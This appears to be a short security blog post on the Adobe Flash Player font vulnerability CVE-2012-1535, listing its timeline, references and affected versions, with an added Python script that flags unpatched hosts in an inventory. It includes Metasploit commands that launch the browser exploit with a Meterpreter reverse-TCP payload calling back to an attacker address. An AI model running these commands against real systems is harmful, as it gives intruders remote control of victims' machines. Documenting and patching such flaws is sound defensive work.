Timeline :
Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor on 2012-08-14
Metasploit PoC provided on 2012-08-17
PoC provided by :
Alexander Gavrun
juan vazquez
sinn3r
Reference(s) :
APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009
Affected version(s) :
Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome versions earlier than 21.0.1180.79
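As a defender-side check for the version list above, the following added example (not part of the original post or of the Metasploit module) flags inventory records that fall in the affected ranges. The thresholds are the ones listed on this page; the inventory format, host names and product keys are assumptions constructed for illustration.

```python
# Thresholds are the ones listed on this page; everything else is constructed.
LAST_AFFECTED = {  # hypothetical product keys -> last affected version (inclusive)
    "flash-windows": (11, 3, 300, 270),
    "flash-macintosh": (11, 3, 300, 270),
    "flash-linux": (11, 2, 202, 236),
}
CHROME_FIRST_FIXED = (21, 0, 1180, 79)  # Chrome builds below this are affected

def parse_version(text):
    """Turn 'a.b.c.d' or Flash-style 'a,b,c,d' into a tuple of four ints."""
    parts = text.strip().replace(",", ".").split(".")
    if len(parts) != 4:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in parts)  # int() raises ValueError on junk

def is_affected(product, version_text):
    """Compare field by field as numbers; string order would misplace 11.10."""
    version = parse_version(version_text)
    if product == "chrome":
        return version < CHROME_FIRST_FIXED
    return version <= LAST_AFFECTED[product]  # KeyError for unknown products

def triage(lines):
    """Split 'host product version' records into (affected, unknown) host lists."""
    affected, unknown = [], []
    for line in lines:
        fields = line.split()
        try:
            host, product, version = fields
            if is_affected(product, version):
                affected.append(host)
        except (ValueError, KeyError):
            # Unparseable records are reported, not silently treated as safe.
            unknown.append(fields[0] if fields else line)
    return affected, unknown

SAMPLE_INVENTORY = [  # constructed records
    "ws-01 flash-windows 11.3.300.268",   # the version this page was tested on
    "ws-02 flash-windows 11.3.300.271",
    "ws-03 flash-linux 11.2.202.236",
    "ws-04 flash-linux 11.2.202.238",
    "ws-05 chrome 21.0.1180.79",
    "ws-06 chrome 21.0.1180.60",
    "ws-07 flash-macintosh 11,3,300,270",
    "ws-08 flash-windows unknown",
]
```

Calling `triage(SAMPLE_INVENTORY)` returns the hosts that still need the update and, separately, the hosts whose records could not be evaluated.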
Tested on Windows 7 Integral with :
Internet Explorer 9
Adobe Flash Player 11.3.300.268
Description :
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.
Commands :
use exploit/windows/browser/adobe_flash_otf_font
set SRVHOST 192.168.178.100
set ROP JRE
set TARGET 6
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
Thanks for the share, great info! And the best part is that the exploit is already available in BackTrack 5 R3.